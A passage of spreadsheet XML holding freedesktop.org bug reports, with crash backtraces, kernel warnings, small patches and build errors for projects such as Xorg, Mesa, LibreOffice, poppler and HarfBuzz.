#14 0x00007f338d97722c in QSGGuiThreadRenderLoop::renderWindow (this=0x556bf82e0a30 window=) at scenegraph/qsgrenderloop.cpp:429
#15 0x00007f338d9f81de in QQuickWindow::event (this=0x556bf828de90 e=0x7ffc7491d980) at items/qquickwindow.cpp:1601
#16 0x00007f338bbcb42a in doNotify (receiver= event=) at kernel/qcoreapplication.cpp:1140
#17 0x00007f338bbcb526 in QCoreApplication::notifyInternal2 (receiver=0x556bf828de90 event=0x7ffc7491d980) at kernel/qcoreapplication.cpp:1050
#18 0x00007f338c132f41 in QWindowPrivate::deliverUpdateRequest() () from /usr/lib64/libQt5Gui.so.5
#19 0x00007f338c1334b1 in QWindow::event(QEvent*) () from /usr/lib64/libQt5Gui.so.5
#20 0x00007f338d9f817d in QQuickWindow::event (this=0x556bf828de90 e=0x7ffc7491db30) at items/qquickwindow.cpp:1620
#21 0x00007f338bbcb42a in doNotify (receiver= event=) at kernel/qcoreapplication.cpp:1140
#22 0x00007f338bbcb526 in QCoreApplication::notifyInternal2 (receiver=0x556bf828de90 event=event@entry=0x7ffc7491db30) at kernel/qcoreapplication.cpp:1050
#23 0x00007f338bc1f31b in QCoreApplication::sendEvent (event=0x7ffc7491db30 receiver=) at ../../include/QtCore/../../src/corelib/kernel/qcoreapplication.h:234
#24 QTimerInfoList::activateTimers (this=0x556bf82580b0) at kernel/qtimerinfo_unix.cpp:643
#25 0x00007f338bc1fd29 in timerSourceDispatch (source=) at kernel/qeventdispatcher_glib.cpp:182
#26 idleTimerSourceDispatch (source=) at kernel/qeventdispatcher_glib.cpp:229
#27 0x00007f3387a771ee in g_main_context_dispatch () from /usr/lib64/libglib-2.0.so.0
#28 0x00007f3387a77465 in ?? () from /usr/lib64/libglib-2.0.so.0
#29 0x00007f3387a7752c in g_main_context_iteration () from /usr/lib64/libglib-2.0.so.0
#30 0x00007f338bc2017f in QEventDispatcherGlib::processEvents (this=0x556bf8255c40 flags=...) at kernel/qeventdispatcher_glib.cpp:423
#31 0x00007f33821d8231 in ?? () from /usr/lib64/libQt5XcbQpa.so.5
#32 0x00007f338bbca132 in QEventLoop::exec (this=this@entry=0x7ffc7491ddb0 flags=... flags@entry=...) at kernel/qeventloop.cpp:212
#33 0x00007f338bbd2dd4 in QCoreApplication::exec () at kernel/qcoreapplication.cpp:1338
#34 0x0000556bf6cc73ce in main (argc= argv=0x7ffc7491dfb8) at /var/tmp/portage/x11-misc/sddm-0.17.0-r2/work/sddm-0.17.0/src/greeter/GreeterApp.cpp:279
hardware: [AMD/ATI] Curacao XT / Trinidad XT [Radeon R7 370 / R9 270X/370X]</t>
  </si>
  <si>
    <t>johannes.hirte</t>
  </si>
  <si>
    <t>DBUS-30428</t>
  </si>
  <si>
    <t>fix dbus_g_value_build_g_variant and add an inverse</t>
  </si>
  <si>
    <t>Danielle added dbus_g_value_build_g_variant in dbus-glib 0.88. To give telepathy-glib a migration path from dbus-glib to GDBus we'll need an inverse of that function: take a GVariant (which must not contain any of the extensions not supported by dbus-glib like maybe types) and convert it into the dbus-glib type system.
telepathy-glib does not register any non-standard type conversions so it's sufficient for our purposes if the conversion is always done in terms of the types that dbus-glib would use for a variant (so 'as' is always a GStrv 'a{sau}' is always a GHashTable&gt; and so on).
I have a prototype of this somewhere...</t>
  </si>
  <si>
    <t>LIBREOFFICE-60606</t>
  </si>
  <si>
    <t>UI: German translation in context menu</t>
  </si>
  <si>
    <t>Problem description: 
In the context menu for graphics of the German version it reads Mit externen Werkzeug bearbeiten.... It should be Mit externem Werkzeug bearbeiten...
Steps to reproduce:
1. Right click on any (bitmap) graphic in any of the modules Writer Draw or Impress
Current behavior:
Expected behavior:
Operating System: Windows 7
Version: unspecified</t>
  </si>
  <si>
    <t>platinius</t>
  </si>
  <si>
    <t>DRI-93293</t>
  </si>
  <si>
    <t>[BAT SKL] WARN_ON_ONCE(!crtc_clock || cdclk &lt; crtc_clock)</t>
  </si>
  <si>
    <t>Happens on both of the skl CI machines we have: skl-i5k-2 and skl-i7k-2 For some strange reason only one testcase blows up though: igt@kms_pipe_crc_basic@read-crc-pipe-c-frame-sequence
Full dmesg backtrace:
[   95.642367] ------------[ cut here ]------------
[   95.642385] WARNING: CPU: 7 PID: 5661 at drivers/gpu/drm/i915/intel_display.c:13778 skl_max_scale.part.87+0x67/0x70 [i915]()
[   95.642386] WARN_ON_ONCE(!crtc_clock || cdclk &lt; crtc_clock)
[   95.642387] Modules linked in:
[   95.642388]  snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic i915 x86_pkg_temp_thermal snd_hda_intel intel_powerclamp coretemp snd_hda_codec crct10dif_pclmul crc32_pclmul snd_hwdep snd_hda_core snd_pcm mei_me mei i2c_hid e1000e ptp pps_core
[   95.642401] CPU: 7 PID: 5661 Comm: kms_pipe_crc_ba Tainted: G     U          4.4.0-rc4-gfxbench+ #1
[   95.642402] Hardware name: System manufacturer System Product Name/Z170M-PLUS BIOS 0408 08/28/2015
[   95.642403]  ffffffffa029aab0 ffff880243c3fa40 ffffffff813df80c ffff880243c3fa88
[   95.642405]  ffff880243c3fa78 ffffffff810747c1 0000000000010000 ffff8800a51f8548
[   95.642408]  ffff8800a3291148 ffff8800a51f8548 ffffffffa027c620 ffff880243c3fad8
[   95.642410] Call Trace:
[   95.642413]  [] dump_stack+0x4e/0x82
[   95.642416]  [] warn_slowpath_common+0x81/0xc0
[   95.642417]  [] warn_slowpath_fmt+0x47/0x50
[   95.642430]  [] skl_max_scale.part.87+0x67/0x70 [i915]
[   95.642441]  [] intel_check_primary_plane+0xa8/0xc0 [i915]
[   95.642452]  [] intel_plane_atomic_check+0x129/0x1f0 [i915]
[   95.642455]  [] drm_atomic_helper_check_planes+0x43/0x1d0
[   95.642466]  [] intel_atomic_check+0x2f5/0x1090 [i915]
[   95.642469]  [] ? drm_property_unreference_blob+0x4b/0xf0
[   95.642471]  [] ? drm_property_free_blob+0x21/0x60
[   95.642473]  [] drm_atomic_check_only+0x142/0x5e0
[   95.642474]  [] ? drm_atomic_set_mode_prop_for_crtc+0x20/0x110
[   95.642476]  [] drm_atomic_commit+0x12/0x50
[   95.642478]  [] drm_atomic_helper_set_config+0x75/0xb0
[   95.642479]  [] drm_mode_set_config_internal+0x60/0x110
[   95.642481]  [] drm_mode_setcrtc+0x186/0x4e0
[   95.642483]  [] drm_ioctl+0x13d/0x590
[   95.642485]  [] ? drm_mode_setplane+0x1b0/0x1b0
[   95.642487]  [] do_vfs_ioctl+0x2fc/0x550
[   95.642489]  [] ? vm_munmap+0x4a/0x60
[   95.642490]  [] ? __fget_light+0x6a/0x90
[   95.642492]  [] SyS_ioctl+0x3c/0x70
[   95.642494]  [] entry_SYSCALL_64_fastpath+0x16/0x73
[   95.642495] ---[ end trace 7f9751c10d528f7e ]---</t>
  </si>
  <si>
    <t>PULSEAUDIO-94974</t>
  </si>
  <si>
    <t>[PATCH] Updated Turkish translation for PulseAudio</t>
  </si>
  <si>
    <t>Created attachment 123002
Patch for Turkish Translation Update
Turkish translation update by GNOME Turkish translation team: https://l10n.gnome.org/vertimus/PulseAudio/master/po/tr</t>
  </si>
  <si>
    <t>REALMD-93913</t>
  </si>
  <si>
    <t>Documentation error</t>
  </si>
  <si>
    <t>Created attachment 121372
Patch to adcli.xml to fix
The help documentation switches the description of the shell and the uid:
--unix-shell=/bin/shell
Set the loginShell attribute of the new created user account which should be the user's numeric primary user id.
--unix-uid=111
Set the uidNumber attribute of the new created user account which should be a path to a valid shell.</t>
  </si>
  <si>
    <t>GWeatherby</t>
  </si>
  <si>
    <t>POPPLER-16761</t>
  </si>
  <si>
    <t>Clicking two checkboxes on Evince causes crash</t>
  </si>
  <si>
    <t>Created attachment 17730
PDF causing crash
I reported this to the GNOME team (http://bugzilla.gnome.org/show_bug.cgi?id=543120) who suggested it be reported here.
Clicking on two checkboxes on the attached PDF (from http://www.uspto.gov/web/forms/2038-fill.pdf) causes Evince 2.22.2 to crash. poppler version is 0.8.4 Debian testing (lenny) kernel 2.6.25 x86.
To duplicate problem:
1) Open the attached PDF with Evince.
2) Click the Visa checkbox on the third page.
3) Click the Patent fee checkbox in the bottom left portion of the form.
Crash ensues.</t>
  </si>
  <si>
    <t>paul.freitas</t>
  </si>
  <si>
    <t>DRI-94294</t>
  </si>
  <si>
    <t>[BAT ILK HSW] basic-flip-vs-wf_vblank timestamp vs. seq counter difference</t>
  </si>
  <si>
    <t>We appear to sometimes inconsistent vblank timestamps vs. seq numbers. This could be due to the race in the vblank code I tried to fix [1] long time ago but the patch got held hostage due to Daniel's desire to use seqlocks. But since no one volunteered to do the work here we are.
[1] https://lists.freedesktop.org/archives/dri-devel/2015-September/090288.html
/archive/results/CI_IGT_test/CI_DRM_1072/bsw-nuc-2/html/bsw-nuc-2@CI_DRM_1072@1/igt@kms_flip@basic-flip-vs-wf_vblank.html
/archive/results/CI_IGT_test/CI_DRM_1084/snb-x220t/html/snb-x220t@CI_DRM_1084@1/igt@kms_flip@basic-flip-vs-wf_vblank.html</t>
  </si>
  <si>
    <t>HARFBUZZ-31992</t>
  </si>
  <si>
    <t>Resource leak in tibetan_shape_syllable</t>
  </si>
  <si>
    <t>Code analyser tool runned against QT including HarfBuzz reveiled resource leak in tibetan_shape_syllable.
Fix proposal:
diff --git a/src/3rdparty/harfbuzz/src/harfbuzz-tibetan.c b/src/3rdparty/harfbuzz/src/harfbuzz-tibetan.c
index bfa31b1..4b2e8f8 100644
--- a/src/3rdparty/harfbuzz/src/harfbuzz-tibetan.c
+++ b/src/3rdparty/harfbuzz/src/harfbuzz-tibetan.c
@@ -1136 +1137 @@ static HB_Bool tibetan_shape_syllable(HB_Bool openType HB_ShaperItem *item HB_
     if (item-&gt;num_glyphs item.length + 4) {
         item-&gt;num_glyphs = item-&gt;item.length + 4
+        HB_FREE_STACKARRAY(reordered)
         return FALSE
     }</t>
  </si>
  <si>
    <t>LIBREOFFICE-71993</t>
  </si>
  <si>
    <t>FORMATTING: smallarrow (type of arrow end) is not straight</t>
  </si>
  <si>
    <t>Created attachment 89750
smallarrow_not_aligned_with_arrow_body
Draw an arrow. Change the arrow end to small arrow for one or both ends. Zoom in on top of the arrow. Notice that the handles of the arrow are not aligned with the arrow body anymore. Try to rotate the arrow notice that the dashed line drawn to help the user is not aligned with the arrow ends. Few other arrow end types that I tried did not seem to show this problem. There would be no problem of a small shift on the blunt types (like the square end). But on a very sharp model it is visible when making the end a bit large that the triangle defining the the arrow end lacks symmetry. 
See attached picture.</t>
  </si>
  <si>
    <t>jerome</t>
  </si>
  <si>
    <t>XORG-98878</t>
  </si>
  <si>
    <t>Gracefully handle EOF while parsing files.</t>
  </si>
  <si>
    <t>Created attachment 128227
My proposed patch
libXpm does not properly handle EOF conditions when xpmGetC is called
multiple times in a row to construct a string. Instead of checking
its return value for EOF the result is automatically casted into a
char and attached to a string.
By carefully crafting the color table in an XPM file it is possible to
send a libXpm program like gimp into a very long lasting loop and
massive memory allocations.
Otherwise no memory issues arise therefore this is just a purely
functional patch to dismiss invalid input.</t>
  </si>
  <si>
    <t>MESA-17102</t>
  </si>
  <si>
    <t>[GM45] ut2004 crashs X with ring error</t>
  </si>
  <si>
    <t>Created attachment 18249
xorg.0.log
System Environment:
--------------------------
Host:		GM45
Arch:		x86_64
Kernel:		2.6.26-rc6
Libdrm_stable: 2.3.0		d51e1bb56ca2f7858cdeac6f61a7b747c1e15b1e
Mesa_stable:	7.0-branch	79ec4ae8b86f9dca18ccc136842a604d13cf3ace
Xserver_stable:	1.4-branch	ff49f5944d06b17fb904c4f64b8660aab60d8d0d
Xf86_video_intel_stable:2.4-branch	81bd24d8b1a3cdb8a539f4ca0c5f546e4c8070ed
DrmR_stable:		shipped with kernel patch-2.6.27-rc2
Bug detailed description:
--------------------------
start Xrun ut2004 with the script which is  attached X will crash and there are a lot of ring error in the Xorg.0.log:
********************************************
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
Ring at virtual 0x7fcedff2a000 head 0x0 tail 0x1fff0 count 32764
***********************************************
following is the backtrace:
#0  0x0000003d104c957c in writev () from /lib64/libc.so.6
#1  0x000000000056382c in _XSERVTransSocketWritev (
    ciptr= buf=0x7fff39c6c180 size=1)
    at /opt/X11R7/include/X11/Xtrans/Xtranssock.c:2301
#2  0x000000000055de08 in FlushClient (who=0x8e5d20 oc=0x8e5cf0
    extraBuf=0x0 extraCount=0) at io.c:1060
#3  0x000000000055e732 in FlushAllOutput () at io.c:812
#4  0x0000000000448cd1 in Dispatch () at dispatch.c:464
#5  0x0000000000431575 in main (argc=2 argv=0x7fff39c6c7c8
    envp=) at main.c:452
Reproduce steps:
----------------
1. xinit&amp;
2../run.sh</t>
  </si>
  <si>
    <t>TELEPATHY-21014</t>
  </si>
  <si>
    <t>Create/EnsureChannel should be able to raise Offline.</t>
  </si>
  <si>
    <t>For instance you can't create an FT channel to an offline contact in Gabble.
 contains:
commit bbbda2e2517bae984db70a289dabe8c3ea4653bf
Author: Will Thompson 
Date:   Thu Apr 2 19:06:08 2009 +0100
    Allow Create/Ensure channel to raise Offline
 spec/Connection_Interface_Requests.xml |   12 ++++++++++++
 1 files changed 12 insertions(+) 0 deletions(-)</t>
  </si>
  <si>
    <t>XORG-58249</t>
  </si>
  <si>
    <t>Scrolling artifacts in GTK2 applications [gen6 SNA]</t>
  </si>
  <si>
    <t>On my gen6 based notebook running 2.20.15 I sometimes experience artifacts when scrolling in GTK2 applications. It seems like something is wrong with CopyArea.
Although scrolling takes place immediately some pixel lines are updated only after some delay reminding me of some effects provided by openoffice impress when changing slides.
Its very visible in the Thunar file manager when scrolling through directories containing a large number of items the pidgin chat application or the sysprof system wide profiler gui.
Unfourtunatly when running a screen-cast application those effects do not happen so a video created with my horrible old mobile phone is the best I can provide for now: http://youtu.be/q7_UaaGmvyw</t>
  </si>
  <si>
    <t>LIBREOFFICE-71682</t>
  </si>
  <si>
    <t>CONFIGURATION: help</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. ....
2. ....test
3. ....
Current behavior:
Expected behavior:
Operating System: Windows XP
Version: 4.2.0.0.alpha0+ Master</t>
  </si>
  <si>
    <t>XORG-11360</t>
  </si>
  <si>
    <t>Radeon 9200 on ppc no longer works with X11?</t>
  </si>
  <si>
    <t>I get the error message (EE) No devices detected on a Mac G4 (PowerPC chip) with an ATI Radeon Mac Edition 9200 in it.  The software involved is:
Gentoo Linux
xorg-x11 7.2
xorg-server 1.2.0-r3 
xf86-video-ati 6.6.3 
The kernel gives messages indicating it sees both the card and the attached display.  X11 fails to see the card however when using the radeon driver.  (It had worked previously probably with 7.1.)  The best I can get out of X11 is using the fbdev driver.
You can find a brief discussion of the problem as well as a Gentoo developer's recommendation that I send the problem upstream to you at the URL associated with this bug namely http://forums.gentoo.org/viewtopic-t-566015.html  A folder with the Xorg.0.log xorg.conf etc. is under http://www.pdc.kth.se/~mike/PPC_X11/</t>
  </si>
  <si>
    <t>XORG-23445</t>
  </si>
  <si>
    <t>NV46: GPU lockup with gdm prompt AND logged in fbcon</t>
  </si>
  <si>
    <t>I got these errors on the logs after switching from Xorg to another VT and logging in:
(...)
Aug 21 23:39:50 pinguinus login[5571]: ROOT LOGIN  on '/dev/tty1'
Aug 21 23:40:01 pinguinus cron[5579]: (root) CMD (test -x /usr/sbin/run-crons &amp;&amp; /usr/sbin/run-crons )
Aug 21 23:40:02 pinguinus [   47.488542] nouveau 0000:01:00.0: PFIFO_CACHE_ERROR - Ch 0/3 Mthd 0x1268 Data 0x00000000
Aug 21 23:40:02 pinguinus [   47.488548] nouveau 0000:01:00.0: Unhandled PFIFO_INTR - 0x00010000
Aug 21 23:40:02 pinguinus [   47.488555] nouveau 0000:01:00.0: PFIFO_CACHE_ERROR - Ch 0/2 Mthd 0x0c6c Data 0x00000000
Aug 21 23:40:02 pinguinus [   47.488561] nouveau 0000:01:00.0: Unhandled PFIFO_INTR - 0x00010000
Aug 21 23:40:02 pinguinus [   47.488587] nouveau 0000:01:00.0: Unhandled PFIFO_INTR - 0x00010000
Aug 21 23:40:03 pinguinus [   47.730059] nouveau 0000:01:00.0: GPU lockup - switching to software fbcon
Aug 21 23:40:03 pinguinus [   47.977559] nouveau 0000:01:00.0: GPU lockup - switching to software fbcon
Aug 21 23:40:03 pinguinus [   48.220945] nouveau 0000:01:00.0: GPU lockup - switching to software fbcon
The GPU lockup message goes on and on and the terminal is damn slow. After trying to change back to the X's VT the system seemed to hang. Ctrl+Alt+SysRq still worked so I managed to sync disk and reboot:
(...)
Aug 21 23:42:58 pinguinus [  223.124393] nouveau 0000:01:00.0: GPU lockup - switching to software fbcon
Aug 21 23:42:58 pinguinus [  223.351695] nouveau 0000:01:00.0: GPU lockup - switching to software fbcon
Aug 21 23:43:03 pinguinus [  228.097813] SysRq : Emergency Sync
Aug 21 23:43:42 pinguinus syslog-ng[5220]: syslog-ng starting up version='2.1.4'
(...)
Today I've switched to all-git versions of Xorg components and it has been a quite a ride so far :)</t>
  </si>
  <si>
    <t>seventhguardian</t>
  </si>
  <si>
    <t>XORG-51140</t>
  </si>
  <si>
    <t>git xserver fails to build (bisected)</t>
  </si>
  <si>
    <t>xserver-8dc70ac and ffb47a1 (Keith Packard) fail to build.
No build issue with xserver-db9d2b8 and previous ones.
./autogen.sh --prefix=/usr --libdir=/usr/lib/x86_64-linux-gnu --enable-debug=no --without-doxygen
make:
-----
Making all in glx
make[1]: Entering directory `/home/jos/src/xorg/git/xserver/glx'
  CC     glxdri2.lo
glxdri2.c: In function '__glXDRIscreenDestroy':
glxdri2.c:374:18: warning: cast discards '__attribute__((const))' qualifier from pointer target type [-Wcast-qual]
glxdri2.c: In function 'dri2_convert_glx_attribs':
glxdri2.c:422:20: error: '__DRI_CTX_FLAG_DEBUG' undeclared (first use in this function)
glxdri2.c:422:20: note: each undeclared identifier is reported only once for each function it appears in
glxdri2.c:422:43: error: '__DRI_CTX_FLAG_FORWARD_COMPATIBLE' undeclared (first use in this function)
glxdri2.c: In function 'initializeExtensions':
glxdri2.c:822:29: warning: cast discards '__attribute__((const))' qualifier from pointer target type [-Wcast-qual]
glxdri2.c: In function '__glXDRIscreenProbe':
glxdri2.c:859:36: warning: cast discards '__attribute__((const))' qualifier from pointer target type [-Wcast-qual]
glxdri2.c:860:24: warning: cast discards '__attribute__((const))' qualifier from pointer target type [-Wcast-qual]
glxdri2.c: At top level:
glxdri2.c:382:1: warning: 'dri2_convert_glx_attribs' defined but not used [-Wunused-function]
make[1]: *** [glxdri2.lo] Error 1
make[1]: Leaving directory `/home/jos/src/xorg/git/xserver/glx'
make: *** [all-recursive] Error 1
----</t>
  </si>
  <si>
    <t>LIBREOFFICE-67319</t>
  </si>
  <si>
    <t>TDFÂ Site: Converted Doc image for Write Now 4.0 is wrong</t>
  </si>
  <si>
    <t>Problem description: 
On this page: http://www.libreoffice.org/download/4-1-new-features-and-fixes/
under the section Support for Legacy Mac Word Processor Documents the Converted Doc image for Write Now 4.0 is the wrong image and is un-clickable. The correct image can be found in the linked blog post just above.
Operating System: All
Version: 4.1.0.4 release</t>
  </si>
  <si>
    <t>jscipione</t>
  </si>
  <si>
    <t>POPPLER-102653</t>
  </si>
  <si>
    <t>NULL pointer dereference vulnerability in poppler 0.59.0 FoFiType1C::convertToType0:907</t>
  </si>
  <si>
    <t>Created attachment 134155
a corpus of crash
a NULL pointer dereference vulnerability is triggered in FoFiType1C::convertToType0 when I use pdftops to convert pdf to ps file.
We can trace it with gdb:
#gdb -q ./utils/pdftops
Reading symbols from ./utils/pdftops...done.
(gdb) run crash.pdf a
Starting program: /work/poppler-0.59.0/utils/pdftops ../output_ps/crashes/id:000000sig:11src:000001op:flip1pos:10912 a
[Thread debugging using libthread_db enabled]
Using host libthread_db library /lib/x86_64-linux-gnu/libthread_db.so.1.
Program received signal SIGSEGV Segmentation fault.
0x0000000000544f85 in FoFiType1C::convertToType0 (this= psName= codeMap= nCodes= outputFunc= outputStream=0xb48ab0)
    at FoFiType1C.cc:907
907	    if (privateDicts[fd].hasFontMatrix) {
(gdb) bt
#0  0x0000000000544f85 in FoFiType1C::convertToType0 (this= psName= codeMap= nCodes= outputFunc= 
    outputStream=0xb48ab0) at FoFiType1C.cc:907
#1  0x000000000048eab9 in PSOutputDev::setupEmbeddedCIDType0Font (this=0xb48e70 font= id=0xb4c288 psName=0xb3e310) at PSOutputDev.cc:2655
#2  0x00000000004854e8 in PSOutputDev::setupFont (this=0xb48e70 font= parentResDict=) at PSOutputDev.cc:1953
#3  0x000000000048339b in PSOutputDev::setupFonts (this=0xb48e70 resDict=0xb49910) at PSOutputDev.cc:1885
#4  0x00000000004804f1 in PSOutputDev::setupResources (this=0xb48e70 resDict=0xb49910) at PSOutputDev.cc:1798
#5  0x000000000047c2bf in PSOutputDev::writeDocSetup (this=0xb48e70 doc= catalog= pages=... duplexA=) at PSOutputDev.cc:1696
#6  0x0000000000478f93 in PSOutputDev::postInit (this=) at PSOutputDev.cc:1455
#7  0x0000000000495a44 in PSOutputDev::checkPageSlice (this=0xb48e70 page=0xb49e20 rotateA=0 
    useMediaBox= crop=true sliceX=-1 sliceY=-1 sliceW=0 sliceH=11836960 printing= 
    abortCheckCbk= abortCheckCbkData= annotDisplayDecideCbk= annotDisplayDecideCbkData=) at PSOutputDev.cc:3246
#8  0x0000000000701dd4 in Page::displaySlice (this=0xb49e20 out= hDPI= vDPI= rotate= useMediaBox= 
    crop= sliceX=-1 sliceY=1 sliceW=12023799 sliceH=-1 printing= abortCheckCbk= abortCheckCbkData= 
    annotDisplayDecideCbk= annotDisplayDecideCbkData= copyXRef=) at Page.cc:539
#9  0x0000000000701d03 in Page::display (this=0xb4b4b2 out=0x85d300 hDPI=1.3980432860952889e-76 vDPI=2.3715151000379834e-322 rotate=11832208 useMediaBox= 
    crop= printing= abortCheckCbk=0x0 abortCheckCbkData=0x0 annotDisplayDecideCbk=0x0 annotDisplayDecideCbkData=0x0 copyXRef=) at Page.cc:481
#10 0x00000000004218f2 in PDFDoc::displayPage (this=0xb3df80 out=0xb48e70 page=1 hDPI= vDPI= rotate=0 
    useMediaBox= 
    crop= printing= abortCheckCbk= abortCheckCbkData= 
    annotDisplayDecideCbk= annotDisplayDecideCbkData= copyXRef=) at PDFDoc.cc:485
#11 0x0000000000408184 in main (argc= argv=) at pdftops.cc:422
We can see the code in PsOutputDev.cc:2655
 // convert it to a Type 0 font
  if ((fontBuf = font-&gt;readEmbFontFile(xref &amp;fontLen))) {
    if ((ffT1C = FoFiType1C::make(fontBuf fontLen))) {
      if (globalParams-&gt;getPSLevel() &gt;= psLevel3) {
	// Level 3: use a CID font
	ffT1C-&gt;convertToCIDType0(psName-&gt;getCString() NULL 0
				 outputFunc outputStream)
      } else {
	// otherwise: use a non-CID composite font
	ffT1C-&gt;convertToType0(psName-&gt;getCString() NULL 0
			      outputFunc outputStream)
      }
      delete ffT1C
    }
    gfree(fontBuf)
  }
it creates a new FoFiType1C Object with null privateDicts and call convertToType0 and in line 907 it access privateDicts directly without checking if it's initialized.
FoFiType1C *FoFiType1C::make(char *fileA int lenA) {
  FoFiType1C *ff
  ff = new FoFiType1C(fileA lenA gFalse)
  if (!ff-&gt;parse()) {
    delete ff
    return NULL
  }
  return ff
}
FoFiType1C::FoFiType1C(char *fileA int lenA GBool freeFileDataA):
  FoFiBase(fileA lenA freeFileDataA)
{
  name = NULL
  encoding = NULL
  privateDicts = NULL
  fdSelect = NULL
  charset = NULL
  charsetLength = 0
}
void FoFiType1C::convertToType0(char *psName int *codeMap int nCodes
				FoFiOutputFunc outputFunc
				void *outputStream) {
...
if (privateDicts[fd].hasFontMatrix) {
...</t>
  </si>
  <si>
    <t>MESA-6980</t>
  </si>
  <si>
    <t>Need to be able to build both dri and osmesa capable library at the same time</t>
  </si>
  <si>
    <t>Currently it appears that you cannot build both a dri capable libGL and an
osmesa capable libGL at the same time.  This causes trouble for distributions
that are trying to provide generic full featured libraries that can operate on
a wide range of hardware.</t>
  </si>
  <si>
    <t>UPOWER-28286</t>
  </si>
  <si>
    <t>Add iDevice battery status</t>
  </si>
  <si>
    <t>iDevices export their battery information. This isn't supported at the system level (kernel) so would require some custom code.
- udev will show devices appearing and disappearing
- for each device we'll check the battery using:
$ ideviceinfo -q com.apple.mobile.battery
BatteryCurrentCapacity: 100
BatteryIsCharging: false
every:
$ ideviceinfo -q com.apple.mobile.iTunes  | grep -i battery
BatteryPollInterval: 60
seconds
Ideas on where to integrate this exactly?</t>
  </si>
  <si>
    <t>LIBREOFFICE-70160</t>
  </si>
  <si>
    <t>docked windows shrink up to zero size on resize</t>
  </si>
  <si>
    <t>Every docked window (except sidebar) can not be resized it just shrinks to zero size with no possibility to be shown again.
E.g. Command window in Math Navigator (F5) in Writer...
Regression from:
commit 16ea2dc1f572d698923c770a2a58f7ab402d1298
Author: Prashant Pandey 
Date:   Sat Sep 7 23:53:02 2013 +0530
    Sidebar: Correcting anomalous mouse behaviour while resizing</t>
  </si>
  <si>
    <t>prashant3.yishu</t>
  </si>
  <si>
    <t>DEJAVU-9039</t>
  </si>
  <si>
    <t>Bad glyph shape for U+024C LATIN SMALL LETTER R WITH STROKE</t>
  </si>
  <si>
    <t>The glyph shape for U+024C LATIN SMALL LETTER R WITH STROKE appears to be
different from the one on the Unicode charts and also the one in the Unicode
proposal for encoding the character. The DejaVu glyph (in Sans fonts) has the
stroke only cross the left part while in the Unicode charts the stroke happens
to be following the horizontal stem sticking out from the left side and in the
sample included in the WG2 proposal it appears to do the same but also stick out
from the right side (figure 28 on page 14).
WG2 proposal: http://std.dkuug.dk/JTC1/SC2/WG2/docs/n2906.pdf
Unicode charts: http://www.unicode.org/charts/PDF/U0180.pdf</t>
  </si>
  <si>
    <t>XORG-99220</t>
  </si>
  <si>
    <t>Depth=32 not redrawn correctly (CopyArea has no effect)</t>
  </si>
  <si>
    <t>The window manager called awesome by default uses depth=32 for its windows. This causes the following problem. When starting with the argument `--no-argb` which makes it use the root's depth and visual instead the problem does not occur.
* Start awesome
* Start a terminal (Mod4+Enter in the default config)
* Switch to tag 2 (tag=workspace Mod4+2 in the default config)
* Notice that the taglist at the top of the screen now has 2 highlighted
* Switch back to tag 1 (Mod4+1)
* Notice that the taglist *still* has the 2 highlighted
When one now moves the terminal over the taglist (click+drag on the titlebar) the exposed areas are redrawn correctly.
Awesome draws to a pixmap and when done does a CopyArea request to update the window. Expose events are handled in the same way.
I have several reasons to think that this is a bug in the server:
* `--no-argb` / using the default depth and visual makes the problem go away
* Exposure shows the expected content hence the pixmap used for double buffering has the right content
* People reported that switching video drivers caused the problem or made it go away.
Also the following patch fixes the problem. The effect of the patch should be to update all windows with automatic redirection (depth=32 but parent has another depth) needlessly all the time. The word needlessly here shows that something is wrong but I cannot figure out what (the patch should not make a difference but it does!). The damage extension seems to report things correctly but still the composite extension code sees an empty damage area...
diff --git a/composite/compwindow.c b/composite/compwindow.c
index bcd230c37..913882618 100644
--- a/composite/compwindow.c
+++ b/composite/compwindow.c
@@ -6967 +6967 @@ compWindowUpdateAutomatic(WindowPtr pWin)
     /*
      * Clip the picture
      */
-    SetPictureClipRegion(pDstPicture 0 0 pRegion)
+    //SetPictureClipRegion(pDstPicture 0 0 pRegion)
     /*
      * And paint
@@ -7247 +7247 @@ compPaintWindowToParent(WindowPtr pWin)
     if (pWin-&gt;redirectDraw != RedirectDrawNone) {
         CompWindowPtr cw = GetCompWindow(pWin)
-        if (cw-&gt;damaged) {
+        if (1 || cw-&gt;damaged) {
             compWindowUpdateAutomatic(pWin)
             cw-&gt;damaged = FALSE
         }
This is a forwarding of at least the following bugs the oldest of which is 1.5 years old:
https://github.com/awesomeWM/awesome/issues/1322
https://github.com/awesomeWM/awesome/issues/925
https://github.com/awesomeWM/awesome/issues/264
I'd be more than happy to help debugging this but I am out of idea to try. Myself I can only reproduce this with Xephyr but others have had this happen for example with Xorg and vboxvideo or radeon.</t>
  </si>
  <si>
    <t>LIBVA-77041</t>
  </si>
  <si>
    <t>GPU hang during a mpeg2 video playback</t>
  </si>
  <si>
    <t>during a mpeg2 video playback GPU hang happen at exactly same frames.
there 8 hang frames of 1499 total frames in the clip.
divide the clip into 1 second long small pieces by ffmpeg with -c copy just copy the stream GPU hang happen on the pieces include hang frame.
software decode OK
1) reproduced on Fedora 18(kernel 3.8) + OTC driver on haswell tried gstreamer vaapi-mplayer and GPU hang even gstreamer fakesink used
2) cannot reproduce on SUSE(kernel 3.0) + intel media SDK on haswell output yuv file OK
both kernels use i915 drm module it seems more likely intel VA driver do something wrong
dump the headers of each frame no special parameter or extra big frame.
dump batch buffer(not include reloc trees) and ring buffer seems no overfolw
dmesg messages
